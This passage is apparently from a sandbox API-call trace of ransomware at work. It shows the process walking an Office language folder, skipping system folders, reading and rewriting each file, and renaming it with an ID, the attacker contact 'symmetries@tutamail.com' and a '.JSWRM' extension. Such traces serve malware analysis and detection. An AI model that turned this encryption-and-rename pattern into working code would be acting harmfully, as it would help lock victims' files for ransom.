lpUsedDefaultChar=0x0) returned 12 [0113.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FACILITY.VSL", lpUsedDefaultChar=0x0) returned 12 [0113.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0113.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0113.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0113.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0113.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\facility.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.909] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=87216) returned 1 [0113.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x154b0) returned 0x24c1d0 [0113.910] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x154b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x154b0, lpOverlapped=0x0) returned 1 [0113.920] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.920] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x154b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x154b0, lpOverlapped=0x0) returned 1 [0113.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.921] CloseHandle (hObject=0x238) returned 1 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0113.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0113.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.922] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\facility.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FACILITY.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\facility.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0113.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0113.923] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x463f990, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x463f990, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x463f990, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7ec, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="FLOCH.VRD", cAlternateFileName="")) returned 1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2=".") returned 1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="..") returned 1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="...") returned 1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="windows") returned -1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="recovery") returned -1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="perflogs") returned -1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="documents and settings") returned 1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="$RECYCLE.BIN") returned 1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="system volume information") returned -1 [0113.923] lstrcmpiW (lpString1="FLOCH.VRD", lpString2="msocache") returned -1 [0113.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0113.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLOCH.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLOCH.VRD", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLOCH.VRD", lpUsedDefaultChar=0x0) returned 9 [0113.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0113.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLOCH.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLOCH.VRD", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLOCH.VRD", lpUsedDefaultChar=0x0) returned 9 [0113.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0113.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0113.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0113.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\floch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.924] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2028) returned 1 [0113.924] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e0) returned 0x20c6c0 [0113.924] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0113.933] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.933] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0113.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0113.934] CloseHandle (hObject=0x238) returned 1 [0113.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0113.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0113.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0113.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0113.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0113.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.934] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\floch.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FLOCH.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\floch.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0113.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0113.935] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x463f990, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x463f990, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x463f990, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="FOREST.CSS", cAlternateFileName="")) returned 1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2=".") returned 1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="..") returned 1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="...") returned 1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="windows") returned -1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="recovery") returned -1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="perflogs") returned -1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="documents and settings") returned 1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="$RECYCLE.BIN") returned 1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="system volume information") returned -1 [0113.935] lstrcmpiW (lpString1="FOREST.CSS", lpString2="msocache") returned -1 [0113.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOREST.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOREST.CSS", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOREST.CSS", lpUsedDefaultChar=0x0) returned 10 [0113.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOREST.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOREST.CSS", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOREST.CSS", lpUsedDefaultChar=0x0) returned 10 [0113.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0113.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0113.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0113.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FOREST.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\forest.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.936] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0113.936] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0113.937] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0113.938] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.938] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0113.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0113.939] CloseHandle (hObject=0x238) returned 1 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0113.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0113.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.939] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FOREST.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\forest.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FOREST.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\forest.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0113.943] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="frintl.dll", cAlternateFileName="")) returned 1 [0113.943] lstrcmpiW (lpString1="frintl.dll", lpString2=".") returned 1 [0113.943] lstrcmpiW (lpString1="frintl.dll", lpString2="..") returned 1 [0113.943] lstrcmpiW (lpString1="frintl.dll", lpString2="...") returned 1 [0113.943] lstrcmpiW (lpString1="frintl.dll", lpString2="windows") returned -1 [0113.943] lstrcmpiW (lpString1="frintl.dll", lpString2="recovery") returned -1 [0113.943] lstrcmpiW (lpString1="frintl.dll", lpString2="perflogs") returned -1 [0113.944] lstrcmpiW (lpString1="frintl.dll", lpString2="documents and settings") returned 1 [0113.944] lstrcmpiW (lpString1="frintl.dll", lpString2="$RECYCLE.BIN") returned 1 [0113.944] lstrcmpiW (lpString1="frintl.dll", lpString2="system volume information") returned -1 [0113.944] lstrcmpiW (lpString1="frintl.dll", lpString2="msocache") returned -1 [0113.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frintl.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frintl.dll", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frintl.dll", lpUsedDefaultChar=0x0) returned 10 [0113.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frintl.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frintl.dll", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frintl.dll", lpUsedDefaultChar=0x0) returned 10 [0113.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0113.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0113.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0113.944] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x463f990, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x463f990, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x463f990, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GANTT.CSS", cAlternateFileName="")) returned 1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2=".") returned 1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="..") returned 1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="...") returned 1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="windows") returned -1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="recovery") returned -1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="perflogs") returned -1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="documents and settings") returned 1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="$RECYCLE.BIN") returned 1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="system volume information") returned -1 [0113.944] lstrcmpiW (lpString1="GANTT.CSS", lpString2="msocache") returned -1 [0113.944] RtlAllocateHeap 